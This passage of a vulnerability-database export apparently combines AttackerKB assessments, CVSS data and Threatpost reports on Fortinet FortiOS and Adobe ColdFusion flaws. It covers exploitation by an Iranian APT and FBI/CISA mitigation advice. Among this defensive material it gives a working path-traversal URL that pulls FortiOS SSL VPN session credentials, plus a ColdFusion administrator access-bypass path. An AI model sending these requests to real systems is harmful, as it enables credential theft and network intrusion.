Note the attacker will not be able to log in to the VPN, but the obtained credentials are still valid (potential domain creds) to access corporate mail, etc. \n\n\n**Affected Systems**\n\n * FortiOS 6.0: 6.0.0 to 6.0.4 \n\n * FortiOS 5.6: 5.6.3 to 5.6.7 \n\n * FortiOS 5.4: 5.4.6 to 5.4.12 \n\n\nNOTE: Only if the SSL VPN service (web-mode or tunnel-mode) is enabled.\n\n**PoC**\n\nThere are some public working exploits for this vulnerability, targeting the \u201csslvpn_websessions\u201d system file.\n\nAn attacker would access the following URL:\n\n * https://`<IP_ADDRESS>`/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession \n\n\nAnd after some parsing to the binary file, something like the following output would be obtained:\n\n\n\nNOTE: Example image obtained from <https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-04T00:00:00", "type": "attackerkb", "title": "CVE-2018-13379 Path Traversal in Fortinet FortiOS", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, 
"impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812"], "modified": "2021-07-27T00:00:00", "id": "AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "href": "https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios/rapid7-analysis", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:43:23", "description": "An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.\n\n \n**Recent assessments:** \n \n**wvu-r7** at July 28, 2020 6:12pm UTC reported:\n\nThe advisory isn\u2019t worded very well, but it seems that logging in to the SSL VPN with a different-case username than set will allow 2FA to be bypassed, opening up the VPN to password attacks, such as password spraying.\n\nSuccessful VPN access to an internal network can open up a lot of doors for an attacker, turning an external compromise into an authorized internal one. Many corporate services are hidden behind VPN. That said, proper network segmentation and secondary access controls can mitigate some of the risk. The \u201cattacker value\u201d is \u201cmedium\u201d because this is just a 2FA bypass and also because of the listed caveats. 
It isn\u2019t terribly useful on its own.\n\nThe [KB article](<https://kb.fortinet.com/kb/documentLink.do?externalID=FD37033>) is written much better.\n\n**ccondon-r7** at April 05, 2021 2:09pm UTC reported:\n\nThe advisory isn\u2019t worded very well, but it seems that logging in to the SSL VPN with a different-case username than set will allow 2FA to be bypassed, opening up the VPN to password attacks, such as password spraying.\n\nSuccessful VPN access to an internal network can open up a lot of doors for an attacker, turning an external compromise into an authorized internal one. Many corporate services are hidden behind VPN. That said, proper network segmentation and secondary access controls can mitigate some of the risk. The \u201cattacker value\u201d is \u201cmedium\u201d because this is just a 2FA bypass and also because of the listed caveats. It isn\u2019t terribly useful on its own.\n\nThe [KB article](<https://kb.fortinet.com/kb/documentLink.do?externalID=FD37033>) is written much better.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-24T00:00:00", "type": "attackerkb", "title": "CVE-2020-12812", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-12812"], "modified": "2023-10-07T00:00:00", "id": "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A", "href": "https://attackerkb.com/topics/8qnr47UsVL/cve-2020-12812", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T23:26:22", "description": "Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction.\n\n \n**Recent assessments:** \n \n**sfewer-r7** at June 22, 2023 7:13pm UTC reported:\n\nAfter investigating a separate ColdFusion vulnerability [CVE-2023-26360](<https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis>) and in conjunction with privately reported information regarding CVE-2023-26359, I can rate this vulnerability as easily exploited and vulnerable in a default configuration.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-14T00:00:00", "type": "attackerkb", "title": "CVE-2023-26359", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26359", "CVE-2023-26360"], "modified": "2023-04-14T00:00:00", "id": "AKB:5DB640DC-B30F-464A-BC81-ED3C15946D65", "href": "https://attackerkb.com/topics/1iRdvtUgtW/cve-2023-26359", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-25T18:06:40", "description": "A deserialization of untrusted data vulnerability in Adobe ColdFusion versions 2021 and 2018 leads to arbitrary remote code execution.\n\n \n**Recent assessments:** \n \n**sfewer-r7** at June 22, 2023 7:05pm UTC reported:\n\nBased on writing an [exploit](<https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb>) and the [AttackerKB Analysis](<https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360#rapid7-analysis>), I can confirm the exploitability of this vulnerability is easy and in a default configuration of the target software.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-04-14T00:00:00", "type": "attackerkb", "title": "CVE-2023-26360", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26359", "CVE-2023-26360"], "modified": "2023-04-14T00:00:00", "id": "AKB:FB9BE99D-7DDE-493D-8C9D-12F3DD901458", "href": "https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-06T11:25:34", "description": "Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to access the administration CFM and CFC endpoints. Exploitation of this issue does not require user interaction.\n\n \n**Recent assessments:** \n \n**sfewer-r7** at July 20, 2023 4:06pm UTC reported:\n\nAs per the [Rapid7 advisory](<https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/>), this vulnerability allows an attacker to bypass an access control feature designed to permit access to the ColdFusion Administrator endpoints on a ColdFusion web server based on the requesting IP address. When a request originates from an external IP address that is not present in the access controls allow list, access to the requested resource is blocked. 
An attacker can construct a URL whose path contains an unexpected forward slash, such as `//CFIDE/wizards/common/utils.cfc`, and the resource can be accessed regardless of the request's IP address.\n\nThis vulnerability is particularly useful to an attacker as it can be chained with existing RCE vulnerabilities that require targeting CFC or CFM endpoints in the ColdFusion Administrator, such as [CVE-2023-26360](<https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360>) or [CVE-2023-38203](<https://attackerkb.com/topics/61J8cvFAkt/cve-2023-38203>).\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3 \nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-12T00:00:00", "type": "attackerkb", "title": "CVE-2023-29298", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360", "CVE-2023-29298", "CVE-2023-38203"], "modified": "2023-10-08T00:00:00", "id": "AKB:CC339C3D-417D-4477-92A7-746AEA51530C", "href": "https://attackerkb.com/topics/6LnuhTdLBy/cve-2023-29298", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": 
"2021-11-18T02:26:11", "description": "A state-backed Iranian threat actor has been using multiple CVEs \u2013 including both serious Fortinet vulnerabilities for months and a Microsoft Exchange ProxyShell weakness for weeks \u2013 looking to gain a foothold within networks before moving laterally and launching [BitLocker](<https://threatpost.com/hades-ransomware-connections-hafnium/165069/>) ransomware and other nastiness.\n\nA joint [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) published by CISA on Wednesday was meant to highlight the ongoing, malicious cyber assault, which has been tracked by the FBI, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC) and the United Kingdom\u2019s National Cyber Security Centre (NCSC). All of the security bodies have traced the attacks to an Iranian government-sponsored advanced persistent threat (APT).\n\nThe Iranian APT has been exploiting Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021, according to the alert. 
The weaknesses are granting the attackers initial access to systems, which then leads to follow-on operations including ransomware, data exfiltration or encryption, and extortion.\n\nThe APT has used the same Microsoft Exchange vulnerability in Australia.\n\n## CISA Warning Follows Microsoft Report on Six Iranian Threat Groups\n\nCISA\u2019s warning came on the heels of [an analysis](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) of the evolution of Iranian threat actors released by Microsoft\u2019s Threat Intelligence Center (MSTIC) on Tuesday.\n\nMSTIC researchers called out three trends they\u2019ve seen emerge since they started tracking six increasingly sophisticated Iranian APT groups in September 2020:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\nThey\u2019ve seen ransomware attacks coming in waves, averaging every six to eight weeks, as shown in the timeline below.\n\nTimeline of ransomware attacks by Iranian threat actors. 
Source: MSTIC.\n\nIn keeping with what CISA described on Wednesday, MSTIC has seen the Iran-linked [Phosphorous group](<https://threatpost.com/apt-ta453-siphons-intel-mideast/167715/>) \u2013 aka a number of names, including Charming Kitten, TA453, APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 globally target the Exchange and Fortinet flaws \u201cwith the intent of deploying ransomware on vulnerable networks.\u201d\n\nThe researchers pointed to a recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describing a similar intrusion, in which the attackers exploited vulnerabilities in on-premise Exchange Servers to compromise their targets\u2019 environments and encrypt systems via BitLocker ransomware: activity that MSTIC also attributed to Phosphorous.\n\n## No Specific Sectors Targeted\n\nThe threat actors covered in CISA\u2019s alert aren\u2019t targeting specific sectors. Rather, they\u2019re focused on exploiting those irresistible Fortinet and Exchange vulnerabilities.\n\nThe alert advised that the APT actors are \u201cactively targeting a broad range of victims across multiple U.S. 
critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations.\u201d\n\n## Malicious Activity\n\nSince March, the Iranian APT actors have been scanning devices on ports 4443, 8443 and 10443 for the much-exploited, serious Fortinet FortiOS vulnerability tracked as [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) \u2013 a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nIt\u2019s d\u00e9j\u00e0 vu all over again: In April, CISA had [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) about those same ports being scanned by cyberattackers looking for the Fortinet flaws. In its April alert ([PDF](<https://www.ic3.gov/media/news/2021/210402.pdf>)), CISA said that it looked like the APT actors were going after access \u201cto multiple government, commercial, and technology services networks.\u201d\n\nThat\u2019s what APT actors do, CISA said: They exploit critical vulnerabilities like the Fortinet CVEs \u201cto conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spearphishing campaigns, website defacements, and disinformation campaigns.\u201d\n\nCVE-2018-13379 was just one of three security vulnerabilities in the Fortinet SSL VPN that the security bodies had seen being used to gain a foothold within networks before moving laterally and carrying out recon, as the FBI and CISA said in the April alert.\n\nAccording to Wednesday\u2019s report, the APT actors are also enumerating devices for the remaining pair of FortiOS vulnerabilities in the trio CISA saw being exploited in March, which are:\n\n * [CVE-2020-12812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>), an improper-authentication 
vulnerability in SSL VPN in FortiOS that could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username, and\n * [CVE-2019-5591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>): a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\n\u201cThe Iranian Government-sponsored APT actors likely exploited these vulnerabilities to gain access to vulnerable networks,\u201d according to Wednesday\u2019s alert.\n\nIn May, the same Iranian actors also exploited a Fortinet FortiGate firewall to gain access to a U.S. municipal government\u2019s domain. \u201cThe actors likely created an account with the username \u201celie\u201d to further enable malicious activity,\u201d CISA said, pointing to a previous FBI flash alert ([PDF](<https://www.ic3.gov/media/news/2021/210527.pdf>)) on the incident.\n\nIn June, the same APT actors exploited another FortiGate security appliance to access environmental control networks associated with a U.S. children\u2019s hospital after likely leveraging a server assigned to IP addresses 91.214.124[.]143 and 162.55.137[.]20: addresses that the FBI and CISA have linked with Iranian government cyber activity. They did it to \u201cfurther enable malicious activity against the hospital\u2019s network,\u201d CISA explained.\n\n\u201cThe APT actors accessed known user accounts at the hospital from IP address 154.16.192[.]70, which FBI and CISA judge is associated with government of Iran offensive cyber activity,\u201d CISA said.\n\n## Yet More Exchange ProxyShell Attacks\n\nFinally, the gang turned to exploiting a Microsoft Exchange ProxyShell vulnerability \u2013 CVE-2021-34473 \u2013 last month, in order to, again, gain initial access to systems in advance of follow-on operations. 
ACSC believes that the group has also used [CVE-2021-34473](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>) in Australia.\n\nProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords.\n\nThe attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at Black Hat in April. In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed. August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>).\n\n## Indications of Compromise\n\n[CISA\u2019s detailed alert](<https://us-cert.cisa.gov/ncas/alerts/aa21-321a>) gives a laundry list of tactics and techniques being used by the Iran-linked APT.\n\nOne of many indicators of compromise (IOC) that\u2019s been spotted are new user accounts that may have been created by the APT on domain controllers, servers, workstations and active directories [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)].\n\n\u201cSome of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization,\u201d CISA 
advised.\n\nBesides unrecognized user accounts or accounts established to masquerade as existing accounts, these account usernames may be associated with the APT\u2019s activity:\n\n * Support\n * Help\n * elie\n * WADGUtilityAccount\n\nIn its Tuesday analysis, MSTIC researchers cautioned that Iranian operators are flexible, patient and adept, \u201c[having] adapted both their strategic goals and tradecraft.\u201d Over time, they said, the operators have evolved into \u201cmore competent threat actors capable of conducting a full spectrum of operations, including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, researchers said, these threat actors have proved capable of all of the following:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-17T17:04:01", "type": "threatpost", "title": "Exchange, Fortinet Flaws Being Exploited by Iranian APT, CISA Warns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-17T17:04:01", "id": "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "href": "https://threatpost.com/exchange-fortinet-exploited-iranian-apt-cisa/176395/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-05T19:26:27", "description": "The FBI and the Cybersecurity and Infrastructure Security Agency are warning that advanced persistent threat (APT) nation-state actors are actively exploiting known security vulnerabilities in the Fortinet FortiOS cybersecurity operating system, affecting the company\u2019s SSL VPN products.\n\nAccording to an alert issued Friday by the FBI and CISA, cyberattackers are scanning 
devices on ports 4443, 8443 and 10443, looking for unpatched Fortinet security implementations. Specifically, APTs are exploiting CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812.\n\n\u201cIt is likely that the APT actors are scanning for these vulnerabilities to gain access to multiple government, commercial and technology services networks,\u201d according to [the alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>). \u201cAPT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.\u201d\n\nThe bug tracked as [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) is a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nThe [CVE-2019-5591](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>) flaw is a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\nAnd finally, [CVE-2020-12812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>) is an improper-authentication vulnerability in SSL VPN in FortiOS, which could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.\n\n\u201cAttackers are increasingly targeting critical external applications \u2013 VPNs have been targeted even more this last year,\u201d said Zach Hanley, senior red team engineer at Horizon3.AI, via email. 
\u201cThese three vulnerabilities targeting the Fortinet VPN allow an attacker to obtain valid credentials, bypass multifactor authentication (MFA), and man-in-the-middle (MITM) authentication traffic to intercept credentials.\u201d\n\nHanley added, \u201cThe common theme here is: once they are successful, they will look just like your normal users.\u201d\n\nThe bugs are popular with cyberattackers in general, due to Fortinet\u2019s widespread footprint, researchers noted.\n\n\u201cCVE-2018-13379 is a critical vulnerability in the Fortinet FortiOS SSL VPN that has been favored by cybercriminals since exploit details became public in August 2019,\u201d Satnam Narang, staff research engineer at Tenable, said via email. \u201cIn fact, Tenable\u2019s 2020 Threat Landscape Retrospective placed it in our Top 5 Vulnerabilities of 2020 because we see threat actors continue to leverage it in the wild, well over a year after it was first disclosed.\u201d\n\nThe FBI and CISA didn\u2019t specify which APTs are mounting the recent activity.\n\n## Initial Compromise & Recon\n\nOnce exploited, the attackers are moving laterally and carrying out reconnaissance on targets, according to officials.\n\n\u201cThe APT actors may be using any or all of these CVEs to gain access to networks across multiple critical-infrastructure sectors to gain access to key networks as pre-positioning for follow-on data exfiltration or data encryption attacks,\u201d the warning explained. \u201cAPT actors may use other CVEs or common exploitation techniques\u2014such as spear-phishing\u2014to gain access to critical infrastructure networks to pre-position for follow-on attacks.\u201d\n\nThe joint cybersecurity advisory from the FBI and CISA follows last year\u2019s flurry of advisories from U.S. agencies about APT groups using unpatched vulnerabilities to target federal agencies and commercial organizations. 
For instance, in October [an alert went out](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) that APTs were using flaws in outdated VPN technologies from Fortinet, Palo Alto Networks and Pulse Secure to carry out cyberattacks on targets in the United States and overseas.\n\n\u201cIt\u2019s no surprise to see additional Fortinet FortiOS vulnerabilities like CVE-2019-5591 and CVE-2020-12812 added to the list of known, but unpatched flaws being leveraged by these threat actors,\u201d said Narang. \u201cOver the last few years, SSL VPN vulnerabilities have been an attractive target for APT groups and cybercriminals alike. With the shift to remote work and the increased demand for SSL VPNs like Fortinet and others, the attack surface and available targets have expanded. Organizations should take this advisory seriously and prioritize patching their Fortinet devices immediately if they haven\u2019t done so already.\u201d\n\n## **How Can I Protect My Network from Cyberattacks?**\n\nThe FBI and CISA suggest a range of best practices to help organizations thwart these and other attacks:\n\n * Immediately patch CVEs 2018-13379, 2020-12812 and 2019-5591.\n * If FortiOS is not used by your organization, add key artifact files used by FortiOS to your organization\u2019s execution-deny list. Any attempts to install or run this program and its associated files should be prevented.\n * Regularly back up data, air-gap and password-protect backup copies offline. 
Ensure copies of critical data are not accessible for modification or deletion from the primary system where the data resides.\n * Implement network segmentation.\n * Require administrator credentials to install software.\n * Implement a recovery plan to restore sensitive or proprietary data from a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).\n * Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.\n * Use multifactor authentication where possible.\n * Regularly change passwords to network systems and accounts, and avoid reusing passwords for different accounts. Implement the shortest acceptable timeframe for password changes.\n * Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.\n * Audit user accounts with administrative privileges and configure access controls with least privilege in mind.\n * Install and regularly update antivirus and anti-malware software on all hosts.\n * Consider adding an email banner to emails received from outside your organization.\n * Disable hyperlinks in received emails.\n * Focus on awareness and training. 
Provide users with training on information security principles and techniques, particularly on recognizing and avoiding phishing emails.\n", "cvss3": {}, "published": "2021-04-02T19:56:57", "type": "threatpost", "title": "FBI: APTs Actively Exploiting Fortinet VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-9922"], "modified": "2021-04-02T19:56:57", "id": "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "href": "https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T20:47:20", "description": "UPDATE\n\nAn unpatched OS command-injection security vulnerability has been disclosed in Fortinet\u2019s web application firewall (WAF) platform, known as FortiWeb. It could allow privilege escalation and full device takeover, researchers said.\n\nFortiWeb is a cybersecurity defense platform, [aimed at](<https://www.fortinet.com/products/web-application-firewall/fortiweb>) protecting business-critical web applications from attacks that target known and unknown vulnerabilities. The firewall is built to keep up with the deployment of new or updated features, or the addition of new web APIs, according to Fortinet.\n\nThe bug (CVE pending) exists in FortiWeb\u2019s management interface (version 6.3.11 and prior), and carries a CVSSv3 base score of 8.7 out of 10, making it high-severity. 
